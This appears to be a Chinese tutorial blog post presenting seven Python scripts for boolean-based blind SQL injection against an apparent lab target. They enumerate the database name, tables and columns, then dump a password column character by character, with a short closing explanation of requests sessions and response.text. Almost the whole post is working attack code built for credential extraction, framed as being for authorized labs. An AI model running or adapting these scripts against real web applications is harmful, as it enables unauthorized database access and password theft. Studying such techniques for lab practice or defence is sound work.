SQL 布尔盲注脚本（仅用于已获授权的测试或靶场环境）

发布时间 2023-11-10 21:28:27作者: LC静一

数据库长度

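# Boolean-based blind SQL injection, step 1: length of the current database name.
#
# Oracle shared by every script on this page: the injected condition is treated as
# TRUE when the response body contains the string "2018" (presumably text that only the
# genuine record renders -- confirm against the lab page before trusting any result).
# The host:port is specific to one lab instance; adjust TARGET when it changes.
# Only run this against systems you are authorized to test.
TARGET = 'http://124.70.71.251:40332/new_list.php?id=1 and length(database())='
TRUE_MARKER = "2018"
TIMEOUT = 10  # seconds per request; without it a stalled server hangs the scan forever


def find_database_length(sess, base_url=TARGET, max_len=19, marker=TRUE_MARKER, timeout=TIMEOUT):
    """Return the length of ``database()``, or None if no value in 1..max_len matches.

    sess: anything with ``get(url, timeout=...)`` returning an object with ``.text``
          (a ``requests.Session`` works; a stub works for testing).
    base_url: the injection prefix; the candidate length is appended verbatim.
    max_len: largest length tried (the original tried 0..19; MySQL allows names up to 64).
    """
    for length in range(1, max_len + 1):  # 0 can never match a non-empty name
        resp = sess.get(base_url + str(length), timeout=timeout)
        if marker in resp.text:
            return length  # stop at the first hit instead of sending the remaining probes
    return None


if __name__ == "__main__":
    # Imported here so the helper can be imported (and unit-tested) without requests.
    from requests import session
    print(find_database_length(session()))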

数据库名称

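# Step 2: recover the database name one character at a time.
# Oracle, target and authorization caveat: same as step 1 (response contains "2018"
# when the injected condition is TRUE; host:port is per lab instance).
TARGET = 'http://124.70.71.251:40545/new_list.php?id=1 and '
TRUE_MARKER = "2018"
TIMEOUT = 10  # seconds per request
CHARSET = range(48, 128)  # '0'..DEL; extend if the name may contain '-' or other low ASCII


def extract_database_name(sess, base_url=TARGET, length=10, marker=TRUE_MARKER,
                          timeout=TIMEOUT, charset=CHARSET):
    """Return the first *length* characters of ``database()`` found via the boolean oracle.

    sess: object with ``get(url, timeout=...)`` returning something with ``.text``.
    length: number of positions to probe -- use the value from step 1.
    charset: candidate ASCII codes tried per position. A position whose character is not
             in it is skipped (as in the original), so the result may be shorter.

    Bug fixed versus the original: MySQL SUBSTR() positions start at 1 -- SUBSTR(x, 0, 1)
    returns '' -- so probing positions 0..9 never recovered the first character and
    never looked at the tenth.
    """
    recovered = []
    for pos in range(1, length + 1):
        for code in charset:
            payload = f"{base_url}ascii(substr(database(),{pos},1))={code}--+"
            resp = sess.get(payload, timeout=timeout)
            if marker in resp.text:
                recovered.append(chr(code))
                break  # one character per position; skip the remaining candidates
    return "".join(recovered)


if __name__ == "__main__":
    from requests import session  # local import keeps the helper importable without requests
    print(extract_database_name(session()))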

数据库表数量

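# Step 3: number of tables in the target schema.
# Oracle, target and authorization caveat: same as step 1.
TARGET = 'http://124.70.71.251:47637/new_list.php?id=1 and '
TRUE_MARKER = "2018"
TIMEOUT = 10  # seconds per request


def count_tables(sess, base_url=TARGET, schema='stormgroup', max_count=19,
                 marker=TRUE_MARKER, timeout=TIMEOUT):
    """Return the number of tables in *schema* (0..max_count), or None if nothing matched.

    sess: object with ``get(url, timeout=...)`` returning something with ``.text``.
    schema: interpolated into the injected SQL as a quoted literal. It is operator input,
            not untrusted data, but keep it a plain identifier -- a quote would break
            the payload.
    max_count: largest count tried (the original tried 0..19).
    """
    for count in range(max_count + 1):  # 0 is a legitimate answer (empty schema)
        payload = (f"{base_url}(select count(table_name) from information_schema.tables "
                   f"where table_schema='{schema}')={count}--+")
        resp = sess.get(payload, timeout=timeout)
        if marker in resp.text:
            return count  # first hit wins; no need to send the remaining probes
    return None


if __name__ == "__main__":
    from requests import session  # local import keeps the helper importable without requests
    print(count_tables(session()))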

数据库表名长度（下面的脚本逐表枚举 table_name 的长度，并不直接得到表名本身）

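# Step 4: length of each table name in the target schema (one probe loop per table).
# Oracle, target and authorization caveat: same as step 1.
TARGET = 'http://124.70.71.251:47637/new_list.php?id=1 and '
TRUE_MARKER = "2018"
TIMEOUT = 10  # seconds per request


def table_name_lengths(sess, base_url=TARGET, schema='stormgroup', table_count=2,
                       max_len=19, marker=TRUE_MARKER, timeout=TIMEOUT):
    """Return one length per table (None where no length in 1..max_len matched).

    sess: object with ``get(url, timeout=...)`` returning something with ``.text``.
    table_count: number of tables, i.e. the result of step 3.
    max_len: largest length tried (the original tried 0..19; 0 can never match).

    Tables are selected with ``limit N,1`` and no ORDER BY, so the order is whatever the
    server returns; the later scripts index tables the same way, so results line up.
    """
    lengths = []
    for index in range(table_count):
        found = None
        for length in range(1, max_len + 1):
            payload = (f"{base_url}length((select table_name from information_schema.tables "
                       f"where table_schema='{schema}' limit {index},1))={length}--+")
            resp = sess.get(payload, timeout=timeout)
            if marker in resp.text:
                found = length
                break  # first hit wins for this table
        lengths.append(found)
    return lengths


if __name__ == "__main__":
    from requests import session  # local import keeps the helper importable without requests
    for length in table_name_lengths(session()):
        print(length)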

字段数量

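# Step 5: number of columns in the target table.
# Oracle, target and authorization caveat: same as step 1.
TARGET = 'http://124.70.71.251:47637/new_list.php?id=1 and '
TRUE_MARKER = "2018"
TIMEOUT = 10  # seconds per request


def count_columns(sess, base_url=TARGET, schema='stormgroup', table='member', max_count=9,
                  marker=TRUE_MARKER, timeout=TIMEOUT):
    """Return the column count of *schema*.*table* (0..max_count), or None if nothing matched.

    sess: object with ``get(url, timeout=...)`` returning something with ``.text``.
    schema, table: interpolated into the injected SQL as quoted literals (operator input;
                   keep them plain identifiers).
    max_count: largest count tried. The original tried 0..9, which a real table easily
               exceeds -- raise it when the result is None.
    """
    for count in range(max_count + 1):
        payload = (f"{base_url}(select count(column_name) from information_schema.columns "
                   f"where table_schema='{schema}' and table_name='{table}')={count} --+")
        resp = sess.get(payload, timeout=timeout)
        if marker in resp.text:
            return count  # first hit wins; no need to send the remaining probes
    return None


if __name__ == "__main__":
    from requests import session  # local import keeps the helper importable without requests
    print(count_columns(session()))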

字段名

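# Step 6: names of the columns in the target table, one character at a time.
# Oracle, target and authorization caveat: same as step 1.
TARGET = 'http://124.70.71.251:47637/new_list.php?id=1 and '
TRUE_MARKER = "2018"
TIMEOUT = 10  # seconds per request
CHARSET = range(47, 128)  # the original started at '/'; '_' (95) is included, '-' (45) is not


def extract_column_names(sess, base_url=TARGET, schema='stormgroup', table='member',
                         column_count=3, max_len=10, marker=TRUE_MARKER, timeout=TIMEOUT,
                         charset=CHARSET):
    """Return a list of *column_count* column names, each up to *max_len* characters.

    sess: object with ``get(url, timeout=...)`` returning something with ``.text``.
    column_count: number of columns, i.e. the result of step 5.
    max_len: positions probed per name (1..max_len). Positions with no matching
             character are skipped, as in the original.

    Changes versus the original: positions now start at 1 (MySQL SUBSTR() is 1-indexed,
    so position 0 returned '' and the first character of every name was lost), the
    query is restricted to *schema* like step 5 (without it a ``member`` table in any
    other schema could be picked up), and probing stops at the first hit per position.
    """
    names = []
    for index in range(column_count):
        chars = []
        for pos in range(1, max_len + 1):
            for code in charset:
                payload = (f"{base_url}ascii(substr((select column_name from information_schema.columns "
                           f"where table_schema='{schema}' and table_name='{table}' "
                           f"limit {index},1),{pos},1))={code}--+")
                resp = sess.get(payload, timeout=timeout)
                if marker in resp.text:
                    chars.append(chr(code))
                    break  # one character per position
        names.append("".join(chars))
    return names


if __name__ == "__main__":
    from requests import session  # local import keeps the helper importable without requests
    for name in extract_column_names(session()):
        print(name)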

爆破表中密码

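# Step 7: dump the password column row by row, one character at a time.
# Oracle, target and authorization caveat: same as step 1. Whatever this recovers is a
# credential (or a hash of one): handle it under the engagement's rules and do not leave
# it in logs or pastes.
TARGET = 'http://124.70.71.251:47637/new_list.php?id=1 and '
TRUE_MARKER = "2018"
TIMEOUT = 10  # seconds per request
CHARSET = range(48, 128)  # '0'..DEL; widen it if the values may contain '-' or other low ASCII


def extract_passwords(sess, base_url=TARGET, table='member', column='password', row_count=3,
                      max_len=50, marker=TRUE_MARKER, timeout=TIMEOUT, charset=CHARSET):
    """Return one string per row: the first *max_len* characters of *column*.

    sess: object with ``get(url, timeout=...)`` returning something with ``.text``.
    table, column: names from steps 4 and 6; interpolated unquoted into the injected SQL.
    row_count: rows to read (``limit N,1`` with no ORDER BY, so order is server-defined).
    max_len: positions probed per row (1..max_len; the original probed 0..49, and
             position 0 never matches because MySQL SUBSTR() is 1-indexed).

    Worst case this sends max_len * len(charset) requests per row (~4000 with the
    defaults). Stopping at the first hit per position (added here) halves that on
    average; a binary search on ``ascii(...) > code`` would need ~7 probes per
    character and is the obvious next improvement.
    """
    rows = []
    for row in range(row_count):
        chars = []
        for pos in range(1, max_len + 1):
            for code in charset:
                payload = (f"{base_url}ascii(substr((select {column} from {table} "
                           f"limit {row},1),{pos},1))={code} --+")
                resp = sess.get(payload, timeout=timeout)
                if marker in resp.text:
                    chars.append(chr(code))
                    break  # one character per position
        rows.append("".join(chars))
    return rows


if __name__ == "__main__":
    from requests import session  # local import keeps the helper importable without requests
    for value in extract_passwords(session()):
        print(value)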

对一些代码做一下解释:

r=session():它的作用是创建一个新的会话对象,该对象可以用于管理与远程服务器之间的连接和请求。通过使用会话对象,你可以保持一些状态信息,例如cookies、headers等,以便在不同的请求之间共享。

re.text：直接输出 re 对象只会显示它的默认字符串表示形式（例如 `<Response [200]>`，即状态码），并不包含响应正文。上面的脚本需要在正文里查找 "2018" 这个标记来判断注入条件是否为真，所以要用 re.text 取响应的主体内容；如果只关心正文，re.text 也更加方便和直观。

比如:

 

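import requests

url = 'https://www.example.com'
# Always pass a timeout: requests otherwise waits indefinitely on a stalled server.
response = requests.get(url, timeout=10)

print(response)
# Output: <Response [200]>  -- just the status code; the body is in response.text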